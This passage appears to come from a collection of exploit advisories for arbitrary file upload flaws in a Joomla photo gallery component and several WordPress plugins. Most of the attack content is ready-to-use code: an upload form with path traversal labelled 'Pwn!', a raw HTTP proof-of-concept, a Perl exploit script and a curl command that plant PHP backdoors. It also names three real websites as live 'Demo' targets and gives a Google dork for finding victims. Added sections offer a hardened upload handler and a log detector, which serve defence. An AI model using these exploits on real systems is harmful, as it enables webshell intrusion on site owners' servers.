    # Exploit :
     
    <form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
        <input type="file" name="uploadfile"><br>
        <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
        <input type="submit" name="Submit" value="Pwn!">
    </form>
     
    # Name of Shell Show you after Click on Pwn!, Name is random (eg : backdoor__FDSfezfs.php)
     
    # Shell Path : http://localhost/backdoor__[RandomString].php
     
    # Demo : http://www.aphroditesvision.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
    #        http://www.ffessm91.fr/administrator/components/com_simplephotogallery/lib/uploadFile.php
    #        http://freros-dazur.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
     
Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload Vulnerability
Code:
    #Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File Upload
    #Product: Wordpress plugin Simple Ads Manager
    #Vendor: https://profiles.wordpress.org/minimus/
    #Affected version: Simple Ads Manager 2.5.94
    #Download link: https://wordpress.org/plugins/simple-ads-manager/
    #CVE ID: CVE-2015-2825
    #Author: Tran Dinh Tien ([email protected]) & ITAS Team
      
      
    ::PROOF OF CONCEPT::
      
    + REQUEST
    POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
    Host: targer.com
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Content-Type: multipart/form-data; boundary=---------------------------108989518220095255551617421026
    Content-Length: 683
      
    -----------------------------108989518220095255551617421026
    Content-Disposition: form-data; name="uploadfile"; filename="info.php"
    Content-Type: application/x-php
      
    <?php phpinfo(); ?>
    -----------------------------108989518220095255551617421026
    Content-Disposition: form-data; name="action"
      
    upload_ad_image
-----------------------------108989518220095255551617421026--
      
      
    + Vulnerable file: simple-ads-manager/sam-ajax-admin.php
      
    + Vulnerable code: from line 303 to 314
      
        case 'sam_ajax_upload_ad_image':
          if(isset($_POST['path'])) {
            $uploadDir = $_POST['path'];
            $file = $uploadDir . basename($_FILES['uploadfile']['name']);
      
            if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) {
              $out = array('status' => "success");
            } else {
              $out = array('status' => "error");
            }
          }
          break;
            
            
    + REFERENCE:
    - http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en
    - https://www.youtube.com/watch?v=8IU9EtUTkxI
     
WordPress PHP Event Calendar 1.5 Arbitrary File Upload Vulnerability
Code:
    ######################################################################
    # Exploit Title: Wordpress PHP Event Calendar Plugin - Arbitrary File Upload
    # Google Dork: inurl:/plugins/php-event-calendar/
    # Date: 02.04.2015
    # Exploit Author: CrashBandicot (@DosPerl)
    # Source Plugin: https://wordpress.org/plugins/php-event-calendar/
    # Vendor HomePage: http://phpeventcalendar.com/
    # Version: 1.5
    # Tested on: MSwin
    ######################################################################
     
    # Path of File : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php
    # Vulnerable File : uploadify.php
     
    <?php
    /*
    Uploadify
    Copyright (c) 2012 Reactive Apps, Ronnie Garcia
    Released under the MIT License <http://www.opensource.org/licenses/mit-license.php> 
    */
     
    // Define a destination
    //$targetFolder = '/uploads'; // Relative to the root
    $targetFolder = $_POST['targetFolder']; // wp upload directory
    $dir = str_replace('\\','/',dirname(__FILE__));
     
    //$verifyToken = md5('unique_salt' . $_POST['timestamp']);
     
    if (!empty($_FILES)) {
        $tempFile = $_FILES['Filedata']['tmp_name'];
        //$targetPath = $dir.$targetFolder;
        $targetPath = $targetFolder;
        $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];
        $targetFile = rtrim($targetPath,'/') . '/' . $fileName;
     
        // Validate the file type
        $fileTypes = array('jpg','jpeg','gif','png'); // File extensions
        $fileParts = pathinfo($_FILES['Filedata']['name']);
     
        if (in_array($fileParts['extension'],$fileTypes)) {
            move_uploaded_file($tempFile,$targetFile);
            echo '1';
        } else {
            echo 'Invalid file type.';
        }
    }
    ?>
     
     
    # Exploit
     
    #!/usr/bin/perl
     
    use LWP::UserAgent;
     
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
     
    print "\t   +===================================================\n";
    print "\t   | PHP event Calendar Plugin - Arbitrary File Upload \n";
    print "\t   | Author: CrashBandicot\n";
    print "\t   +===================================================\n\n";
     
    die "usage : perl $0 backdoor.php.gif" unless $ARGV[0];
     
     $file = $ARGV[0];
     
    my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
    my $ch = $ua->post("http://127.0.0.1/wp-content/plugins/php-event-calendar/server/classes/uploadify.php", Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content;
    if($ch = ~/1/) { 
    print "\n  [+] File Uploaded !";
    } else { print "\n  [-] Target not Vuln"; }
     
    __END__
     
     
    # Path Shell : http://localhost/0day_backdoor.php.gif
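The three vulnerable handlers quoted above share the same two defects: the destination directory comes from the request (`jpath` in the Joomla component, `$_POST['path']` in Simple Ads Manager, `targetFolder` in uploadify.php), and the file name is either unchecked or checked only on its last extension, so `backdoor.php.gif` passes the `pathinfo()` test. The handler below is an added example, not code from any of the vendors or advisories, showing the controls a fixed upload endpoint needs. It assumes PHP 7 or later, a form field named `uploadfile`, and a fixed `UPLOAD_BASE` directory (placeholder path) that the web server is configured not to execute scripts from.

```php
<?php
// Added example: hardened upload handler. Not the vendors' code.
// Assumes PHP >= 7, POST field "uploadfile", and that UPLOAD_BASE
// (placeholder) has script execution disabled at the web server.
declare(strict_types=1);

const UPLOAD_BASE  = '/var/www/uploads';              // fixed; never taken from the request
const ALLOWED_EXT  = ['jpg', 'jpeg', 'gif', 'png'];
const ALLOWED_MIME = ['image/jpeg', 'image/gif', 'image/png'];
const MAX_BYTES    = 2 * 1024 * 1024;

function safe_upload(array $f): array
{
    // 1. PHP-level sanity: real upload, no transfer error, size bounded.
    if ($f['error'] !== UPLOAD_ERR_OK) {
        return ['ok' => false, 'reason' => 'upload error ' . $f['error']];
    }
    if (!is_uploaded_file($f['tmp_name'])) {
        return ['ok' => false, 'reason' => 'not an uploaded file'];
    }
    if ($f['size'] > MAX_BYTES) {
        return ['ok' => false, 'reason' => 'too large'];
    }

    // 2. Check every extension segment, not only the last one, so that
    //    "backdoor.php.gif" is rejected: with an AddHandler-style Apache
    //    configuration, mod_mime can still hand such a file to PHP.
    $parts = explode('.', strtolower(basename($f['name'])));
    array_shift($parts);                                // drop the base name
    if (count($parts) === 0) {
        return ['ok' => false, 'reason' => 'no extension'];
    }
    foreach ($parts as $ext) {
        if (!in_array($ext, ALLOWED_EXT, true)) {
            return ['ok' => false, 'reason' => "extension '$ext' not allowed"];
        }
    }

    // 3. Check the content, not just the name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        return ['ok' => false, 'reason' => "mime '$mime' not allowed"];
    }
    if (@getimagesize($f['tmp_name']) === false) {
        return ['ok' => false, 'reason' => 'not a decodable image'];
    }

    // 4. Server-chosen name and directory: nothing from the request reaches
    //    the filesystem path, so jpath/path/targetFolder traversal cannot occur.
    $dest = UPLOAD_BASE . '/' . bin2hex(random_bytes(16)) . '.' . end($parts);

    // 5. Belt and braces: confirm the resolved parent is still the base dir.
    if (realpath(dirname($dest)) !== realpath(UPLOAD_BASE)) {
        return ['ok' => false, 'reason' => 'destination escaped base dir'];
    }
    if (!move_uploaded_file($f['tmp_name'], $dest)) {
        return ['ok' => false, 'reason' => 'move failed'];
    }
    chmod($dest, 0644);                                 // never executable
    return ['ok' => true, 'path' => $dest];
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['uploadfile'])) {
    header('Content-Type: application/json');
    echo json_encode(safe_upload($_FILES['uploadfile']));
}
```

Two of the advisories above target admin-side endpoints (`sam-ajax-admin.php`, the Joomla `administrator/` component) that answered unauthenticated requests; inside WordPress the handler should additionally be gated with `current_user_can('upload_files')` and `check_ajax_referer()` before `safe_upload()` is ever reached, and the Joomla equivalent should require an authenticated administrator session.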
     
WordPress Work The Flow File Upload 2.5.2 - Arbitrary File Upload Vulnerability
Code:
    ######################
      
    # Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
      
    # Exploit Author : Claudio Viviani
      
      
    # Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip
      
    # Date : 2015-03-14
      
    # Tested on : Linux BackBox 4.0 / curl 7.35.0
      
    ######################
      
    # Description:
      
    Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. 
    Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving.
    This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow.
      
    ######################
      
    # Location :  
      
    http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
      
      
    ######################
      
    # PoC:
      
     curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
      
    # Backdoor Location:
      
     http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php
      
      
    ######################
      
    # Vulnerability Disclosure Timeline:
      
    2015-03-14:  Discovered vulnerability
    2015-04-03:  Vendor Notification
    2015-04-03:  Vendor Response/Feedback 
    2015-04-04:  Vendor Fix/Patch (2.5.3)
    2014-04-04:  Public Disclosure
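Every advisory on this page leaves the same two traces in a web server access log: a POST to the plugin's upload script, and then a request for a file with a script extension under a directory that should only ever hold uploads (the `files/` directory of jQuery-File-Upload, `wp-content/uploads/`). The following is an added detection example, not part of the advisories, that scans Apache combined-format log lines for both patterns and escalates a client that produced both. The endpoint paths are the ones quoted in the advisories above; the log lines are constructed samples and the IPs are documentation addresses.

```python
import re
from collections import defaultdict

# Upload endpoints named in the advisories on this page (matched as path suffixes).
UPLOAD_ENDPOINTS = (
    "/wp-content/themes/designfolio-plus/admin/upload-file.php",
    "/administrator/components/com_simplephotogallery/lib/uploadFile.php",
    "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php",
    "/wp-content/plugins/php-event-calendar/server/classes/uploadify.php",
    "/wp-content/plugins/work-the-flow-file-upload/public/assets/"
    "jQuery-File-Upload-9.5.0/server/php/index.php",
)

# Directories that should contain uploads only, never executable scripts.
UPLOAD_DIRS = ("/wp-content/uploads/", "/server/php/files/")

# Apache "combined" format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# ".php" (or php3/phtml/phar) as ANY dot-separated segment, so the
# double-extension trick "x.php.gif" from the Event Calendar PoC is caught.
SCRIPT_SEGMENT_RE = re.compile(r'\.(php\d?|phtml|phar)(\.|$)', re.IGNORECASE)

# Constructed sample log (not real traffic); RFC 5737 documentation addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Mar/2015:10:01:02 +0000] "POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php HTTP/1.1" 200 512 "-" "curl/7.35.0"
203.0.113.5 - - [14/Mar/2015:10:01:09 +0000] "GET /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php HTTP/1.1" 200 88 "-" "curl/7.35.0"
198.51.100.7 - - [14/Mar/2015:10:02:00 +0000] "GET /wp-content/uploads/2015/03/photo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [14/Mar/2015:10:03:00 +0000] "GET /wp-content/uploads/0day_backdoor.php.gif HTTP/1.1" 200 61 "-" "Mozilla/5.0"
192.0.2.1 - - [14/Mar/2015:10:04:00 +0000] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a finding label for one parsed entry, or None if it is benign."""
    path = entry["path"].split("?", 1)[0]          # ignore the query string
    if entry["method"] == "POST" and any(path.endswith(e) for e in UPLOAD_ENDPOINTS):
        return "upload-endpoint-post"
    if any(d in path for d in UPLOAD_DIRS) and SCRIPT_SEGMENT_RE.search(path):
        return "script-in-upload-dir"
    return None


def analyze(lines):
    """Return (findings, escalated): every (ip, label, path) hit, and the
    sorted IPs that both posted to an upload endpoint and fetched a script."""
    findings = []
    labels_by_ip = defaultdict(set)
    for line in lines:
        entry = parse(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            findings.append((entry["ip"], label, entry["path"]))
            labels_by_ip[entry["ip"]].add(label)
    escalated = sorted(ip for ip, labels in labels_by_ip.items() if len(labels) == 2)
    return findings, escalated


if __name__ == "__main__":
    hits, bad = analyze(SAMPLE_LOG.splitlines())
    for ip, label, path in hits:
        print(f"{label:22} {ip:15} {path}")
    print("escalate:", ", ".join(bad) or "none")
```

A single hit on either rule is worth a look, but the escalated list is the one to page on: a POST to one of these scripts followed by a successful GET of a `.php` under the upload directory from the same client is the full attack sequence the advisories describe. Blocking script execution in upload directories at the web server removes the second half of that sequence regardless of which plugin is installed.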
     